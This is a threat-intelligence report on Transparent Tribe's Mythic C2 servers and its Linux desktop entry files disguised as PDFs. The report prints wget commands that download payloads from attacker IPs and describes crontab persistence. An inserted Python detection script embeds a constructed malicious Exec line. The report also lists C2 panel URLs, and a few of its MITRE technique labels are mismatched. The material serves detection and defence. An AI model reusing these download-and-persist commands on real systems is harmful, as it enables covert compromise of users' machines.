URL: https://www.cyfirma.com/research/osint-investigation-hunting-malicious-infrastructure-linked-to-transparent-tribe/

OSINT INVESTIGATION: HUNTING MALICIOUS INFRASTRUCTURE LINKED TO TRANSPARENT TRIBE



Published On : 2024-09-27




EXECUTIVE SUMMARY

At CYFIRMA, we provide timely insights into emerging threats and malicious
tactics targeting organizations and individuals. This report details an
investigation aimed at tracking infrastructure linked to the APT group
“Transparent Tribe” and identified potential command-and-control (C2) servers
associated with this threat actor.

15 malicious hosts were identified – hosted by DigitalOcean – and the threat
actor was also found to be employing Linux desktop entry files as a novel attack
vector, targeting individuals in India.

The report highlights the use of Mythic Poseidon binaries as C2 agents, and the
tactics used to evade security and maintain persistence, all of which underscore
the continued threat posed by Transparent Tribe and its evolving techniques.


INTRODUCTION

This open-source intelligence (OSINT) investigation seeks to expose the
infrastructure tied to the APT group “Transparent Tribe,” with a focus on
identifying command-and-control (C2) servers. The investigation was initiated
following a Twitter post from security researcher “@PrakkiSathwik,” which
flagged the IP addresses 206.189.134.185 and 143.198.64.151 as C2 servers linked
to the group.

We chose 143.198.64.151 as the primary pivot point for the investigation. The
IP, hosted by DigitalOcean under ASN AS14061, has been identified as a Mythic C2
server, running services on ports 22 (SSH), 80 (HTTP), and 7443 (HTTPS). Mythic
is a cross-platform, post-exploitation framework designed for red teaming but
has increasingly been misused by threat actors for malicious purposes. Its
collaborative, web-based interface and modular architecture allow attackers to
efficiently – and remotely – control compromised systems.

To further investigate this infrastructure, we used JARM – a tool that
fingerprints servers based on their TLS configurations – and HTML title metadata
to identify additional hosts running the Mythic C2 framework. We found that the
infrastructure consisted of 15 IPs, hosted on DigitalOcean, all linked to the
Mythic exploitation framework.

Our investigation also revealed that the attack campaign uses Linux desktop
entry files to deploy malicious payloads: these files, which were first seen
uploaded from India, suggest that the targets of this campaign are possibly
individuals within the region, which aligns with Transparent Tribe’s history of
targeting Indian government officials through phishing and other attack vectors.

In this report, we focus on tracing the malicious infrastructure while providing
insight into the deployment of Mythic agents and the tactics used by the threat
actor.


KEY POINTS

 * The report focuses on tracking the infrastructure of the APT group
   “Transparent Tribe” (APT36), identifying C2 servers.
 * The investigation was prompted by a Twitter post identifying two IPs linked
   to Transparent Tribe’s C2 servers. The servers are part of Mythic C2
   infrastructure, a cross-platform post-exploitation framework used for red
   teaming which is also abused by threat actors like Transparent Tribe for
   managing compromised systems.
 * The JARM fingerprinting technique initially identified 31,390 servers, which
   were narrowed down to 15 servers associated with the same malicious
   infrastructure. These servers, including the pivot IP 143.198.64.151, were
   found to be hosting Mythic C2 servers and linked to ongoing attacks utilizing
   customized payloads, such as the Poseidon agent, potentially targeting the
   Indian region.
 * The group is distributing malicious Linux desktop entry files disguised as
   PDFs. These files execute scripts to download and run malicious binaries from
   remote servers, establishing persistent access and evading detection.
 * APT36 is increasingly targeting Linux environments due to their widespread
   use in Indian government sectors, particularly with the Debian-based BOSS OS
   and the introduction of Maya OS.
 * This report outlines the infrastructure, methods, and tools used by APT36,
   providing insights into their Linux-based attack campaign and the evolving
   threat specifically to India.


ANALYSIS:

Basic Details:
Pivot Point IP: 143[.]198[.]64[.]151 (C2)

The objective of this OSINT investigation is to track the infrastructure
associated with the APT group “Transparent Tribe” and identify other potential
hosts or servers that may be functioning as C2 servers for this threat actor.

The investigation was initiated based on a Twitter post from a security
researcher, “@PrakkiSathwik,” who identified the IP addresses “206.189.134.185”
and “143.198.64.151” as C2 servers linked to the “Transparent Tribe” group.

Our investigation begins with the IP address “143.198.64.151” as the primary
pivot point.



The IP address has been flagged as malicious by multiple security solutions. The
server is associated with activity related to “MYTHIC,” a C2 server. Mythic C2
is a cross-platform, post-exploitation framework commonly used in red teaming
operations. It is designed to offer a collaborative, user-friendly interface for
operators, managers, and reporting, facilitating efficient coordination and
execution throughout red teaming engagements.



Our OSINT investigation reveals the IP address is linked to the hosting provider
“DigitalOcean” under ASN number “AS14061,” with the location identified as the
United States. The server is running services on ports 22/SSH, 80/HTTP, and
7443/HTTP.



We selected two key pivot points for further investigation based on the
available data: the “JARM” fingerprint and the “HTML Title” with the value
“Mythic.” JARM is a tool designed to fingerprint servers based on their TLS
configurations. It sends a series of unique requests to a server and analyzes
the responses to generate a fingerprint which can then be used to identify and
categorize servers, helping security teams detect malicious or suspicious
infrastructure. JARM aids in identifying servers that may be part of malicious
networks, command and control systems, or other harmful activities, even when
traditional indicators like IP addresses and domains change.



We constructed the following Censys query to hunt for servers/hosts with the
same JARM fingerprint:

services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e"

This query led us to a total of 31,390 hosts.



The second attribute, “Mythic,” refers to the string found in the “HTML Title.”
We refined our query by combining both attributes:

services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e"
and services.http.response.html_title="Mythic"

This reduced the results to 63 hosts, providing a more focused list. However,
for further accuracy, we added a third pivot point: the hosting provider
“Digital Ocean.”



The final query, incorporating three attributes – JARM fingerprint, HTML Title,
and ASN Name – narrowed the results down to 15 hosts.

(services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e"
and services.http.response.html_title="Mythic") and
autonomous_system.name=`DIGITALOCEAN-ASN`



The query returned the following 15 IPs, which are also captured in the YARA
rules at the end of this report.


These IPs are part of a malicious infrastructure, hosting the open-source Mythic
exploitation framework, and serve as C2 servers for Mythic agents to execute
actions directed by the threat actor.

Many security solutions tagged these IPs as malicious and linked to “Mythic”
activity, indicating their role as C2 servers for the Mythic framework.



As mentioned earlier, Mythic is an open-source, cross-platform post-exploitation
framework, widely used for red teaming and offensive security operations. It is
built using Python3, Docker, and Docker-Compose, features a user-friendly
web-based interface, and is designed to support collaborative efforts among
operators, providing a centralized platform for managing compromised systems,
delivering payloads, and executing commands in a stealthy manner.

While Mythic is legitimate software intended for penetration testing and
red-teaming, it has also been co-opted by threat actors for malicious purposes.
In this context, the identified IPs are being utilized by adversaries to control
Mythic agents deployed on compromised systems, functioning as a C2 server to
execute commands and exfiltrate data.

The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on
these server IPs at port 7443. For example, the C2 panel hosted on the server at
IP address 143[.]198[.]64[.]151 can be reached at
https[:]//143[.]198[.]64[.]151[:]7443/new/login.



Similarly, the panel on 165[.]232[.]118[.]207 and on the other IPs can be reached
at https[:]//165[.]232[.]118[.]207[:]7443/new/login and
https[:]//Other_IP[:]7443/new/login respectively.




ETLM ATTRIBUTION

The CYFIRMA research team is committed to the ongoing investigation of emerging
threats, malware, and the tactics, techniques, and procedures (TTPs) employed by
malicious actors. We continuously monitor current threats, track ongoing
campaigns, assess their evolution, and remain vigilant to new developments in
this ever-changing landscape.

Continuing our investigation into the starting IP “143.198.64.151”, it appears
to be part of a broader campaign in which the threat actor uses Linux desktop
entry files as an attack vector. This method was first recorded by researchers
in May 2023 and attributed to “Transparent Tribe”, which used it to target
Indian government officials. A similar pattern is observed in this campaign,
involving Linux desktop entry files and Mythic agent binaries. The associated
files, which were first seen/uploaded from India, suggest that the campaign may
be targeting individuals within the region.

The zip archive (Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26))
containing the malicious Linux desktop entry file (Document Details.pdf.desktop
(md5: e354cf4cc4177e019ad236f8b241ba3c)) is possibly distributed through
phishing emails or malicious websites.

ZIP archive:
Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)

Linux Desktop Entry File:
Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)

The Linux desktop entry file size exceeds 1 MB due to the addition of numerous
“#” characters, likely an attempt to evade security scans. The image below
highlights the extra characters in the inflated file.



Upon removing these extra “#” characters and blank spaces, we obtained the
following script:



The Linux desktop entry file is crafted to look like a legitimate PDF document
link but actually performs a series of malicious actions upon execution.

The entry sets Icon=application-pdf and Name[en_US]=DocumentDetails.pdf, so it
looks like a legitimate PDF file. When the file is opened, it initiates a bash
command that first opens a PDF hosted at the Google Drive link
“https[:]//drive.google[.]com/file/d/1akF76sGydk2k-4tTDydq7T9WxMhoT-av/view?usp=sharing”
using xdg-open; this serves as a decoy to hide the real malicious activity.

Simultaneously, it creates a hidden directory (~/.local/share) on the system,
into which it downloads two malicious files (trs-clip and debian-clip) from two
remote servers (157[.]245[.]139[.]146 and 159[.]89[.]165[.]86) using the wget
command:

wget 157[.]245[.]139[.]146/trs-clip -O ~/.local/share/trs-clip
wget 159[.]89[.]165[.]86/debian-clip -O ~/.local/share/debian-clip

These files are given executable permissions; trs-clip runs in the background
with its output redirected to /dev/null to suppress visible output, after which
debian-clip is run. Next, the script manipulates the crontab (the Linux job
scheduler) to ensure persistence, adding entries that run both malicious files
(trs-clip and debian-clip) on system reboot. Finally, the file attempts to clean
up traces of its presence by removing temporary files.

The Linux desktop entry file downloads malicious payloads from the servers at IP
addresses:
157[.]245[.]139[.]146, 159[.]89[.]165[.]86.
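The traits described above (PDF-looking name and icon, inflated with “#” characters, an inline bash command that downloads into a dot-directory and installs a crontab entry) can be checked automatically. The script below is an added example, not CYFIRMA's code: it strips the padding, parses the [Desktop Entry] keys and scores those traits. The sample entry, its decoy URL and the 203.0.113.10 host are constructed and are not the report's indicators.

```python
#!/usr/bin/env python3
"""Triage of a Linux desktop entry file of the kind described above.
Added example, not CYFIRMA's code: it strips the '#' padding, parses the
[Desktop Entry] keys and scores the masquerading and persistence traits
the report describes. The sample entry is constructed; its host is an
RFC 5737 documentation address, not an indicator from the report."""
import re

# Constructed sample: PDF-looking name and icon, a decoy opened with xdg-open,
# a payload fetched into ~/.local/share and re-launched from crontab, with
# thousands of '#' characters inflating the file (assumed to be on own lines).
SAMPLE = (
    "[Desktop Entry]\n" + "#" * 3000 + "\n"
    "Type=Application\n"
    "Name[en_US]=DocumentDetails.pdf\n"
    "Icon=application-pdf\n"
    "Exec=bash -c \"xdg-open https://example.invalid/decoy & "
    "mkdir -p ~/.local/share; wget 203.0.113.10/x -O ~/.local/share/x; "
    "chmod +x ~/.local/share/x; ~/.local/share/x >/dev/null 2>&1 & "
    "(crontab -l; echo '@reboot ~/.local/share/x') | crontab -\"\n"
    + "#" * 3000 + "\n"
)
# A benign entry in the same format, for comparison (also constructed).
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=gedit\n"

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def strip_padding(text):
    """Drop blank lines and lines made only of '#', returning the cleaned text
    and the fraction of the original characters that were padding."""
    kept = [ln for ln in text.splitlines()
            if ln.strip() and not re.fullmatch(r"#+", ln.strip())]
    cleaned = "\n".join(kept)
    return cleaned, 1 - len(cleaned) / max(len(text), 1)


def parse_entry(cleaned):
    """Collect key=value pairs from the [Desktop Entry] group only."""
    keys, group = {}, None
    for ln in cleaned.splitlines():
        if ln.startswith("[") and ln.endswith("]"):
            group = ln[1:-1]
        elif group == "Desktop Entry" and "=" in ln:
            k, v = ln.split("=", 1)
            keys[k.strip()] = v.strip()
    return keys


def triage(text):
    """Score one desktop entry; three or more traits is treated as suspicious."""
    cleaned, pad_ratio = strip_padding(text)
    entry = parse_entry(cleaned)
    exe = entry.get("Exec", "")
    names = [v for k, v in entry.items() if k == "Name" or k.startswith("Name[")]
    traits = []
    if pad_ratio > 0.5:
        traits.append("padding")            # inflated with '#' to dodge scanners
    if any(DOC_EXT.search(n) for n in names):
        traits.append("document_name")      # displayed name ends in .pdf etc.
    if entry.get("Icon", "") == "application-pdf" and "pdf" not in exe.lower():
        traits.append("pdf_icon")           # PDF icon but no PDF viewer in Exec
    if re.match(r"(ba)?sh\s+-c", exe):
        traits.append("shell_exec")         # launches an inline shell script
    if re.search(r"\b(wget|curl)\b", exe):
        traits.append("downloader")         # fetches a payload at open time
    if re.search(r"crontab|@reboot", exe):
        traits.append("cron_persistence")   # re-runs the payload on reboot
    if re.search(r"~/\.|/\.[a-z]", exe):
        traits.append("hidden_path")        # writes into a dot-directory
    return {"traits": traits, "pad_ratio": round(pad_ratio, 2),
            "suspicious": len(traits) >= 3}


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(BENIGN))
```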

We checked our starting pivot point, the IP “143[.]198[.]64[.]151”, and
identified the file “debian-clip (md5: 242f77b4e65671a55e103b8b26df46a7)”
communicating with this IP. Further analysis identified these Linux payloads as
Mythic Poseidon binaries.





Poseidon is a Golang-based agent that compiles executables for both Linux and
macOS x64 platforms. The malicious C2 infrastructure was identified as a result
of our OSINT investigation, rather than the technical analysis of the binaries.
For a detailed understanding of Poseidon’s functionality and capabilities, which
are well-documented in the open-source Mythic framework, you can refer to the
GitHub repository: https://github.com/MythicAgents/poseidon.

The use of Mythic as a C2 framework highlights the sophistication of the threat
actor behind this infrastructure. Mythic’s capabilities allow for highly
customizable payload delivery and interaction with compromised systems,
potentially enabling large-scale attacks and persistent access. The IPs we
identified during the investigation are associated with Mythic’s activity, which
suggests involvement in coordinated cyber operations, possibly involving
espionage, data theft, or other malicious actions.

Given the use of Linux desktop entry files, similar scripts and tactics, the
deployment of the Mythic exploitation framework, and the Mythic Poseidon
binaries as Linux payloads observed in the Indian region, we assess that this
campaign and its associated malicious infrastructure are linked to the APT group
“Transparent Tribe”.

Transparent Tribe (APT36):
Transparent Tribe, also known as APT36, is a suspected Pakistan-based threat
group that has been active since at least 2013. While not highly sophisticated,
the group is notably persistent and continually adapts its tactics. APT36
primarily targets Indian government officials, as well as the defense and
education sectors.

The group specializes in cyber espionage through credential harvesting and
malware distribution. APT36 frequently employs phishing emails and websites to
deliver malware, using customized RATs (Remote Access Trojans) and open-source
tools such as the Mythic framework. They have also been known to compromise
legitimate official applications to enhance their attacks.

APT36 is using malicious Linux binaries as attack vectors due to the widespread
use of Linux in the Indian government sector. The Debian-based BOSS OS is used
across various ministries and defense forces, creating a large target base.
Additionally, the Indian government’s introduction of Maya OS – a Debian-based
system, set to replace Windows in government and defense – presents a new
opportunity for nation-state actors like APT36 to expand their attacks by
targeting Linux environments.

Diamond Model:




CONCLUSION

This investigation tracked and exposed malicious infrastructure linked to the
Transparent Tribe (APT36) group by leveraging OSINT techniques. Pivoting on the
flagged IP 143[.]198[.]64[.]151 to hunt for C2 servers led to the identification
of 15 servers hosted by DigitalOcean. These servers were found to be part of a
larger infrastructure using the Mythic exploitation framework, a tool that
facilitates control over compromised systems.

The campaign uses Linux desktop entry files as an attack vector, targets
individuals and systems within the Indian region, and deploys Mythic Poseidon
binaries as payloads. By applying techniques such as JARM fingerprinting and
HTML title metadata, this investigation provided crucial insights into the
operational infrastructure of Transparent Tribe, enabling defenders to
understand the scope of its activities and identify patterns for future
detection.

The discovery of this infrastructure highlights the growing sophistication and
persistence of Transparent Tribe’s tactics, as they continue to adapt and expand
their capabilities. The insights gathered from this OSINT investigation will aid
in further monitoring and disrupting similar malicious infrastructures in the
future.


LIST OF IOCS



MITRE ATT&CK TTPS

 * Initial Access (TA0001)
    * T1566: Phishing
    * T1566.001: Spearphishing Attachment
 * Execution (TA0002)
    * T1059: User Execution
    * T1204.002: Malicious File
    * T1059.004: Command and Scripting Interpreter
 * Persistence (TA0003)
    * T1547: Boot or Logon Autostart Execution
 * Defense Evasion (TA0005)
    * T1027: Obfuscated Files or Information
    * T1564.001: Hide Artifacts: Hidden Files and Directories
    * T1070.004: Indicator Removal: File Deletion
 * Discovery (TA0007)
    * T1082: System Information Discovery
    * T1083: File and Directory Discovery
 * Command and Control (TA0011)
    * T1071.001: Application Layer Protocol: Web Protocols
    * T1113: Screen Capture
    * T1048: Exfiltration Over Alternative Protocol


YARA RULES

import "hash"

rule TransparentTribe_Hashes_Detection {
    meta:
        description = "Detection of known hashes associated with Transparent Tribe"
        author = "CRT"

    condition:
        hash.md5(0, filesize) == "242f77b4e65671a55e103b8b26df46a7" or
        hash.md5(0, filesize) == "9d0f1c7825a207a2ad4acd0c9fece794" or
        hash.md5(0, filesize) == "0d7b6773b8bbf9c000f2e4ff04c626e7" or
        hash.md5(0, filesize) == "407ebc6e6d90bef35da9fe1062773543" or
        hash.md5(0, filesize) == "d0a8e733d580fce3bbdad403bf9fd384" or
        hash.md5(0, filesize) == "01d9e52a4b38beb6541c5d3cae265a26" or
        hash.md5(0, filesize) == "e354cf4cc4177e019ad236f8b241ba3c" or
        hash.md5(0, filesize) == "78604255c1386b1d62bd818a9c972e20" or
        hash.md5(0, filesize) == "680619b5858b1a5f785c8af6065f6300"
}

rule MaliciousInfra_IP_Detection {
    meta:
        description = "Detection of known IP addresses associated with Transparent Tribe"
        author = "CRT"

    strings:
        $ip1 = "143.198.64.151"
        $ip2 = "165.232.118.207"
        $ip3 = "161.35.186.219"
        $ip4 = "178.128.92.166"
        $ip5 = "64.23.155.109"
        $ip6 = "159.203.133.189"
        $ip7 = "138.197.156.131"
        $ip8 = "142.93.74.10"
        $ip9 = "152.42.245.111"
        $ip10 = "139.59.109.136"
        $ip11 = "137.184.211.26"
        $ip12 = "159.223.0.196"
        $ip13 = "64.23.213.61"
        $ip14 = "152.42.198.168"
        $ip15 = "206.189.134.185"

    condition:
        any of ($ip*)
}


RECOMMENDATIONS

 * Deploy strong endpoint security solutions equipped with advanced threat
   detection and prevention capabilities to effectively identify and stop
   malicious activities.
 * Keep operating systems, applications, and security software up to date with
   regular patches to mitigate known vulnerabilities frequently exploited by
   cyber threats.
 * Implement network segmentation to restrict lateral movement, preventing
   malware from reaching critical assets and containing potential threats within
   isolated areas.
 * Conduct comprehensive employee training on recognizing phishing threats,
   emphasizing the risks associated with opening attachments or clicking links
   in unsolicited emails.
 * Educate employees to identify social engineering tactics, empowering them to
   avoid falling prey to deceptive strategies that may lead to the execution of
   malicious files.
 * Configure firewalls to block outbound communication with known malicious IP
   addresses and domains associated with command-and-control servers.
 * Employ behavior-based monitoring to detect unusual activity patterns,
   including suspicious processes attempting unauthorized network connections.
 * Enforce application whitelisting policies to allow only approved
   applications, thereby preventing the execution of unauthorized or malicious
   executables.
 * Monitor network traffic for abnormal patterns, such as large data transfers
   to unfamiliar or suspicious IP addresses, indicating potential threats.
 * Develop a comprehensive incident response plan detailing necessary actions in
   the event of a malware infection, including isolating affected systems and
   promptly notifying relevant stakeholders.
 * Stay updated with the latest threat intelligence reports and indicators of
   compromise related to malware to proactively detect and mitigate potential
   threats.
 * Implement regular backups of critical data and systems to minimize the impact
   of ransomware attacks or data loss resulting from malware infections.
 * Follow the principle of least privilege (PoLP) by restricting user
   permissions to only those necessary for specific roles, reducing the impact
   of malware that relies on elevated privileges.
 * Establish and maintain defensive measures by monitoring and blocking
   Indicators of Compromise (IOCs), enhancing defenses based on tactical
   intelligence and provided rules.
